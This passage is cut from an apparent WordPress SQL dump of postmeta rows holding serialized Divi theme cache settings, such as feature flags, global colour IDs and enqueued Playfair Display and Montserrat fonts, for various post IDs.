sets\":\"false\"}\";}'),(32892,608,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32893,608,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32879,991,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32880,1686,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32881,1686,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32882,1686,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32883,1686,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32884,1679,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32885,1679,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32886,1679,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32887,1679,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32888,1059,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32889,1059,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32876,991,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32877,991,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32878,991,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32871,1565,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32872,586,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32873,586,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32874,586,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32875,586,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32867,569,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32868,1565,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32869,1565,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32870,1565,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32866,569,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32862,787,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32863,787,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32864,569,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32865,569,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32858,777,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32859,777,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32860,787,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32861,787,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32855,1677,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32856,777,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32857,777,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32846,1393,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32847,1393,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32848,990,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32849,990,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32850,990,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32851,990,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32852,1677,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32853,1677,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32854,1677,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32843,1532,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32844,1393,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32845,1393,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32839,1170,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32840,1532,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32841,1532,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32842,1532,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32832,665,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32833,665,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32834,665,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\